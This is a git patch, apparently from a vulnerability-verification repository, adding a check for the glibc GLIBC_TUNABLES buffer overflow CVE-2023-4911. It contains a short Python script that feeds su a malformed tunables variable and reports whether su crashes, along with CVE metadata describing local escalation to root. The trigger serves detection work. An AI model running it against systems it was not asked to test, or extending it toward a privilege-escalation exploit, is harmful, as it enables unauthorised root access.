From 314eb60d6e9419281fd0bd5895abd1620e7e898a Mon Sep 17 00:00:00 2001
From: "LI, WENJIE" <liwenjie@kylinos.cn>
Date: Thu, 19 Oct 2023 16:22:45 +0800
Subject: [PATCH] =?UTF-8?q?=E6=B7=BB=E5=8A=A0CVE-2023-4911=E3=80=82?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 cve/glibc/2023/CVE-2023-4911/CVE-2023-4911.py | 10 ++++++++++
 cve/glibc/2023/CVE-2023-4911/README.md        |  4 ++++
 cve/glibc/2023/yaml/CVE-2023-4911.yaml        | 20 +++++++++++++++++++
 other_list.yaml                               |  2 ++
 4 files changed, 36 insertions(+)
 create mode 100644 cve/glibc/2023/CVE-2023-4911/CVE-2023-4911.py
 create mode 100644 cve/glibc/2023/CVE-2023-4911/README.md
 create mode 100644 cve/glibc/2023/yaml/CVE-2023-4911.yaml

diff --git a/cve/glibc/2023/CVE-2023-4911/CVE-2023-4911.py b/cve/glibc/2023/CVE-2023-4911/CVE-2023-4911.py
new file mode 100644
index 00000000..fe607aa4
--- /dev/null
+++ b/cve/glibc/2023/CVE-2023-4911/CVE-2023-4911.py
@@ -0,0 +1,10 @@
+import os
+
+exit_code = os.system('env -i "GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=A" "Z=`printf \'%08192x\' 1`" /usr/bin/su --help')
+
+exit_status = os.WEXITSTATUS(exit_code)
+
+if exit_status == 139:
+    print("status:successfully")
+else:
+    print("status:failed")
diff --git a/cve/glibc/2023/CVE-2023-4911/README.md b/cve/glibc/2023/CVE-2023-4911/README.md
new file mode 100644
index 00000000..1da0a56b
--- /dev/null
+++ b/cve/glibc/2023/CVE-2023-4911/README.md
@@ -0,0 +1,4 @@
+## 漏洞验证
+'''
+python3 CVE-2023-4911.py
+'''
diff --git a/cve/glibc/2023/yaml/CVE-2023-4911.yaml b/cve/glibc/2023/yaml/CVE-2023-4911.yaml
new file mode 100644
index 00000000..1f87d6da
--- /dev/null
+++ b/cve/glibc/2023/yaml/CVE-2023-4911.yaml
@@ -0,0 +1,20 @@
+id: CVE-2023-4911
+source: http://www.openwall.com/lists/oss-security/2023/10/03/2
+info:
+  name: GNU C库（又名glibc），是 GNU 系统以及大多数运行 Linux 内核的系统中的 C 库。
+  severity: High
+  description: |
+    glibc 中引入了 GLIBC_TUNABLES 环境变量，使用户能够在运行时修改库的行为，而无需重新编译应用程序或库。通过设置 GLIBC_TUNABLES，用户可以调整各种性能和行为参数，然后在应用程序启动时应用这些参数。
+    在处理 GLIBC_TUNABLES 环境变量时，GNU C 库的动态加载器 ld.so 中存在缓冲区溢出漏洞，本地低权限用户可在运行具有SUID权限的二进制文件时通过恶意制作的 GLIBC_TUNABLES 环境变量将权限提升为root。
+  scope-of-influence:
+    2.34<=glibc<=2.38
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-4911
+  classification:
+    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 7.8
+    cve-id: CVE-2023-4911
+    cwe-id: CWE-787
+    cnvd-id: None
+    kve-id: None
+  tags: cve2023, 权限提升
\ No newline at end of file
diff --git a/other_list.yaml b/other_list.yaml
index 7fba30d2..5325a720 100644
--- a/other_list.yaml
+++ b/other_list.yaml
@@ -71,4 +71,6 @@ cve:
     - CVE-2022-41352
   Windows Backup Service:
     - CVE-2023-21752 
+  glibc:
+    - CVE-2023-4911
 cnvd:
-- 
Gitee